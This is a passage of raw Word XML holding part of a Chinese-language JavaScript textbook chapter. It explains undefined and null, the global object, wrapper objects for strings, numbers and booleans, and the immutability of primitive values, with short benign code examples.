        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>。引用没有提供实参的函数形参的值也只会得到</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>undefin</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>ed</w:t>
      </w:r>
      <w:r>
        <w:t>是预定义的全局变量（它和</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>不一样，它不是关键字），它的值就是</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>未定义</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>。在</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 3</w:t>
      </w:r>
      <w:r>
        <w:t>中，</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>是可读</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>写的变量，可以给它赋任意值。这个错误在</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>中做了修正，</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>在该版本中是只读的。如果使用</w:t>
      </w:r>
      <w:r>
        <w:t>typeof</w:t>
      </w:r>
      <w:r>
        <w:t>运算符得到</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>的类型，则返回</w:t>
      </w:r>
      <w:r>
        <w:t>"undefined"</w:t>
      </w:r>
      <w:r>
        <w:t>，表明这个值是这个类型的唯一成员。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>尽管</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>是不同的，但它们都表示</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>值的空缺</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>，两者往往可以互换。判断相等运算符</w:t>
      </w:r>
      <w:r>
        <w:t>“==”</w:t>
      </w:r>
      <w:r>
        <w:t>认为两者是相等的（要使用严格相等运算符</w:t>
      </w:r>
      <w:r>
        <w:t>“===”</w:t>
      </w:r>
      <w:r>
        <w:t>来区分它们）。在希望值是布尔类型的地方它们的值都是假值，和</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>类似。</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>都不包含任何属性和方法。实际上，使用</w:t>
      </w:r>
      <w:r>
        <w:t>“.”</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>“[]”</w:t>
      </w:r>
      <w:r>
        <w:t>来存取这两个值的成员或方法都会产生一个类型错误。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>你或许认为</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>是表示系统级</w:t>
      </w:r>
      <w:r>
        <w:t>的、出乎意料的或类似错误的值的空缺，而</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>是表示程序级的、正常的或在意料之中的值的空缺。如果你想将它们赋值给变量或者属性，或将它们作为参数传入函数，最佳选择是使用</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="52" w:name="3_5_Quan_Ju_Dui_Xiang_"/>
      <w:r>
        <w:t>3.5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　全局对象</w:t>
      </w:r>
      <w:bookmarkEnd w:id="52"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>前几节讨论了</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的原始类型和原始值。对象类型</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>对象、数组和函数</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>在本书中均会有独立章节来讲述。但有一类非常重要的对象，我们不得不现在就把它们讲清楚</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>全局对象。全局对象（</w:t>
      </w:r>
      <w:r>
        <w:t>global object</w:t>
      </w:r>
      <w:r>
        <w:t>）在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中有着重要的用途：全局对象的属性是全局定义的符号，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>程序可</w:t>
      </w:r>
      <w:r>
        <w:t>以直接使用。当</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>解释器启动时（或者任何</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器加载新页面的时候），它将创建一个新的全局对象，并给它一组定义的初始属性：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>全局属性，比如</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Infinity</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>NaN</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>全局函数，比如</w:t>
      </w:r>
      <w:r>
        <w:t>isNaN()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>parseInt()</w:t>
      </w:r>
      <w:r>
        <w:t>（见</w:t>
      </w:r>
      <w:r>
        <w:t>3.8.2</w:t>
      </w:r>
      <w:r>
        <w:t>节）和</w:t>
      </w:r>
      <w:r>
        <w:t>eval()</w:t>
      </w:r>
      <w:r>
        <w:t>（见</w:t>
      </w:r>
      <w:r>
        <w:t>4.12</w:t>
      </w:r>
      <w:r>
        <w:t>节）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数，比如</w:t>
      </w:r>
      <w:r>
        <w:t>Date()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>RegExp()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>String()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Object()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Array()</w:t>
      </w:r>
      <w:r>
        <w:t>（见</w:t>
      </w:r>
      <w:r>
        <w:t>3.8.2</w:t>
      </w:r>
      <w:r>
        <w:t>节）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>全局对象，比如</w:t>
      </w:r>
      <w:r>
        <w:t>Math</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>JSON(</w:t>
      </w:r>
      <w:r>
        <w:t>见</w:t>
      </w:r>
      <w:r>
        <w:t>6.9</w:t>
      </w:r>
      <w:r>
        <w:t>节</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>全局对象的初始属性并不是保留字，但它们应该当做保留字来对待。</w:t>
      </w:r>
      <w:r>
        <w:t>2.4.1</w:t>
      </w:r>
      <w:r>
        <w:t>节列出了所有这些属性。本章对一部分全局属性也有描述。其他属性在其他章节也会讲述。可以在第三部分中通过名称查找到，或者通过别名</w:t>
      </w:r>
      <w:r>
        <w:t>"Global"</w:t>
      </w:r>
      <w:r>
        <w:t>来找到这些全局对象。对于客户端</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>来讲，</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象定义了一些额外的全局属性，可以在第四部分中查看它们。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在代码的最顶级</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>不在任何函数内的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>关键字</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>来引用全局对象：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var global=this;//</w:t>
      </w:r>
      <w:r>
        <w:t>定义一个引用全局</w:t>
      </w:r>
      <w:r>
        <w:t>对象的全局变量</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中，在其表示的浏览器窗口中的所有</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码中，</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象充当了全局对象。这个全局</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象有一个属性</w:t>
      </w:r>
      <w:r>
        <w:t>window</w:t>
      </w:r>
      <w:r>
        <w:t>引用其自身，它可以代替</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>来引用全局对象。</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象定义了核心全局属性，但它也针对</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器和客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>定义了一少部分其他全局属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当初次创建的时候，全局对象定义了</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中所有的预定义全局值。这个特殊对象同样包含了为程序定义的全局值。如果代码声明了一个全局变量，这个全局变量就是全局对</w:t>
      </w:r>
      <w:r>
        <w:t>象的一个属性，</w:t>
      </w:r>
      <w:r>
        <w:t>3.10.2</w:t>
      </w:r>
      <w:r>
        <w:t>节有关于此的详尽解释。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="53" w:name="3_6_Bao_Zhuang_Dui_Xiang_"/>
      <w:r>
        <w:t>3.6</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　包装对象</w:t>
      </w:r>
      <w:bookmarkEnd w:id="53"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>对象是一种复合值：它是属性或已命名值的集合。通过</w:t>
      </w:r>
      <w:r>
        <w:t>“.”</w:t>
      </w:r>
      <w:r>
        <w:t>符号来引用属性值。当属性值是一个函数的时候，称其为方法。通过</w:t>
      </w:r>
      <w:r>
        <w:t>o.m()</w:t>
      </w:r>
      <w:r>
        <w:t>来调用对象</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>中的方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>我们看到字符串也同样具有属性和方法：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var s="hello world!";//</w:t>
      </w:r>
      <w:r>
        <w:t>一个字符串</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var word=s.substring(s.indexOf("")+1,s.length);//</w:t>
      </w:r>
      <w:r>
        <w:t>使用字符串的属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>字符串既然不是对象，为什么它会有属性呢？只要引用了字符串</w:t>
      </w:r>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>属性，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>就会将字符串值通过调用</w:t>
      </w:r>
      <w:r>
        <w:t>new String(s)</w:t>
      </w:r>
      <w:r>
        <w:t>的方式转换成对象，这个对象继承了字符串的方法（见</w:t>
      </w:r>
      <w:r>
        <w:t>6.2.2</w:t>
      </w:r>
      <w:r>
        <w:t>节），并被用来处理属性的引用。一旦属性引用结束，这个新创建的对象就会销毁（其实在实现上并不一定创建或销毁这个临时对象，然而整个过程看起来是这样）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>同字符串一样，数字和布尔值也具有各自的方法：通过</w:t>
      </w:r>
      <w:r>
        <w:t>Number()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Boolean()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数创建一个临时对象，这些方法的调用均是来自于这个临时对象。</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>没有包装对象：访问它们的属性会造成一个类型错误。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>看如下</w:t>
      </w:r>
      <w:r>
        <w:t>代码，思考它们的执行结果：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var s="test";//</w:t>
      </w:r>
      <w:r>
        <w:t>创建一个字符串</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>s.len=4;//</w:t>
      </w:r>
      <w:r>
        <w:t>给它设置一个属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var t=s.len;//</w:t>
      </w:r>
      <w:r>
        <w:t>查询这个属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当运行这段代码时，</w:t>
      </w:r>
      <w:r>
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:t>的值是</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>。第二行代码创建一个临时字符串对象，并给其</w:t>
      </w:r>
      <w:r>
        <w:t>len</w:t>
      </w:r>
      <w:r>
        <w:t>属性赋值为</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>，随即销毁这个对象。第三行通过原始的</w:t>
      </w:r>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t>没有被修改过</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t>字符串值创建一个新字符串对象，尝试读取其</w:t>
      </w:r>
      <w:r>
        <w:t>len</w:t>
      </w:r>
      <w:r>
        <w:t>属性，这个属性自然不存在，表达式求值结果为</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>。这段代码说明了在读取字符串、数字和布尔值的属性值（或方法）的时候，表现的像对象一样。但如果你试图给其属性赋值，则会忽略这个操作：修改只是发生在临时对象身上，而这个临时对象并未继续保留下来。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>存取字符串、数字或布尔值的属性时创建的临时对象称做包装对象</w:t>
      </w:r>
      <w:r>
        <w:t>，它只是偶尔用来区分字符串值和字符串对象、数字和数值对象以及布尔值和布尔对象。通常，包装对象只是被看做是一种实现细节，而不用特别关注。由于字符串、数字和布尔值的属性都是只读的，并且不能给它们定义新属性，因此你需要明白它们是有别于对象的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>需要注意的是，可通过</w:t>
      </w:r>
      <w:r>
        <w:t>String()</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>Number()</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>Boolean()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数来显式创建包装对象：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var s="test",n=1,b=true;//</w:t>
      </w:r>
      <w:r>
        <w:t>一个字符串、数字和布尔值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var S=new String(s);//</w:t>
      </w:r>
      <w:r>
        <w:t>一个字符串对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var N=new Numbe</w:t>
      </w:r>
      <w:r>
        <w:t>r(n);//</w:t>
      </w:r>
      <w:r>
        <w:t>一个数值对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var B=new Boolean(b);//</w:t>
      </w:r>
      <w:r>
        <w:t>一个布尔对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>会在必要时将包装对象转换成原始值，因此上段代码中的对象</w:t>
      </w:r>
      <w:r>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>N</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:t>常常</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>但不总是</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>表现的和值</w:t>
      </w:r>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>b</w:t>
      </w:r>
      <w:r>
        <w:t>一样。</w:t>
      </w:r>
      <w:r>
        <w:t>“==”</w:t>
      </w:r>
      <w:r>
        <w:t>等于运算符将原始值和其包装对象视为相等，但</w:t>
      </w:r>
      <w:r>
        <w:t>“===”</w:t>
      </w:r>
      <w:r>
        <w:t>全等运算符将它们视为不等。通过</w:t>
      </w:r>
      <w:r>
        <w:t>typeof</w:t>
      </w:r>
      <w:r>
        <w:t>运算符可以看到原始值和其包装对象的不同。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="54" w:name="3_7_Bu_Ke_Bian_De_Yuan_Shi_Zhi_He_Ke_Bia"/>
      <w:r>
        <w:t>3.7</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　不可变的原始值和可变的对象引用</w:t>
      </w:r>
      <w:bookmarkEnd w:id="54"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中的原始值（</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>、布尔值、数字和字符串）与对象（包括数组和函数）</w:t>
      </w:r>
      <w:r>
        <w:t>有着根本区别。原始值是不可更改的：任何方法都无法更改（或</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>突变</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>）一个原始值。对数字和布尔值来说显然如此</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>改变数字的值本身就说不通，而对字符串来说就不那么明显了，因为字符串看起来像由字符组成的数组，我们期望可以通过指定索引来修改字符串中的字符。实际上，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>是禁止这样做的。字符串中所有的方法看上去返回了一个修改后的字符串，实际上返回的是一个新的字符串值。例如：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>var s="hello";//</w:t>
      </w:r>
      <w:r>
        <w:t>定义一个由小写字母组成的文本</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
